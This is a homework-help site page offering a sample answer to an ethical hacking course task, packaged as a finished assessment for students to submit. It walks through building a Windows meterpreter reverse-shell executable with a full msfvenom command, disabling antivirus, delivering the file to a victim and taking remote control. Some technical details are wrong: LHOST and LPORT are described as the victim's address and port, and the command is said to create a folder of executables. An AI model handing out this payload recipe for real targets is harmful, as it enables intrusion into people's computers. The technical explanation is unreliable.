Urgenthomework logo
UrgentHomeWork
Live chat

Loading..

Csi3508 Ethical Hacking And Defence Assessment Answers

Task

You are to write a technical outline of how the exploit you developed in the workshop operates, from the initial connection, through to compromise.

You should target a primarily non-technical audience in your report.

Formatting Requirements

  • Approximately two pages
  • Font: times new roman, size 11
  • Margins

Effective penetration testing with Metasploit framework and methodologies.

Penetration testing a hands-on introduction to hacking.

Answer:

In the workshop, we came up with Kali Linux Metasploit exploit whose target would mainly be on the windows operating systems (windows XP, 7, 8, 8.1 and 10). This exploit would enable an attacker get into the victim’s machine and do a number of operations just as if logged in. metasploit is basically a project that helps in penetration testing and development of ID signatures. The tool helps in the development of an exploit code as well as its execution in a targeted remote machine (Dieterle, 2016).

For this test our requirements were; a metasploit framework with the entire Ruby packages which we installed in a Kali Linux Operating system computer, two machines, one with a windows operating system and another with a Kali Linux OS. The two machines were allowed to operate in the same NAT network. Because an antivirus would prevent the attack, we ensured that the target machine did not have any antivirus software (Holik, Horalek, Marik, Neradova & Zitta, 2014, p.240). The Metasploit command which we used throughout our penetration test was the Msfconsole simply because of its flexibility and other additional features which supported the tools within the framework.

For us to be in a position to penetrate into the second machine which was operating on a windows platform, we first had to be aware of the machine’s IP address and one of its free PORT numbers which we easily acquired considering that the two machines were operating in the same network. An IP address of a machine operating within the same network can be obtained easily using software called Netcut (Muniz, 2013).

Now to get a chance of penetrating into the second machine, we first of all created an executable file within the Kali Linux platform under the IP address and PORT number specification of the second machine using the command “msfvenom –p windows/meterpreter/reverse_tcp LHOST= (IP address of windows machine) LPORT= (PORT in the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe”

The command allowed us to create an executable folder in the Kali Linux platform and which contained several .exe files. This is the collection of files which we were supposed to send to the target machine through channels line mail or else through the network (Pritchett & De Smet, 2013).

After we send the file to the target machine, we were entitled to activate our metasploit framework into a listening status using the “exploit” command at the Msfconsole handler status. So, when it’s set on a listening mode, it waits until the file send to the victim machine is opened. When the file sent to the victim machine is eventually opened by the victim, on the side of Kali Linux platform “meterpreter” activates itself automatically.

At this juncture, the attacker is inside the victim’s machine and can carry out several operations with full control just like a person who has logged into the system physically. Some of the activities the attacker can do on the victim’s machine include reading the contents of the files on the screen, changing directories, editing files, deleting files, searching for files, uploading files changing local directories, printing local directories, removing directories, moving source to destination, and printing working directories (Weidman, 2014). This implies that the attacker has already hacked into the victim’s computer.

References

Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent Publishing Platform.

Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective penetration testing with Metasploit framework and methodologies. In Computational Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp. 237-242). IEEE.

Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.

Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd

Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.


Buy Csi3508 Ethical Hacking And Defence Assessment Answers Online


Talk to our expert to get the help with Csi3508 Ethical Hacking And Defence Assessment Answers to complete your assessment on time and boost your grades now

The main aim/motive of the management assignment help services is to get connect with a greater number of students, and effectively help, and support them in getting completing their assignments the students also get find this a wonderful opportunity where they could effectively learn more about their topics, as the experts also have the best team members with them in which all the members effectively support each other to get complete their diploma assignments. They complete the assessments of the students in an appropriate manner and deliver them back to the students before the due date of the assignment so that the students could timely submit this, and can score higher marks. The experts of the assignment help services at urgenthomework.com are so much skilled, capable, talented, and experienced in their field of programming homework help writing assignments, so, for this, they can effectively write the best economics assignment help services.


Get Online Support for Csi3508 Ethical Hacking And Defence Assessment Answers Assignment Help Online


Copyright © 2009-2023 UrgentHomework.com, All right reserved.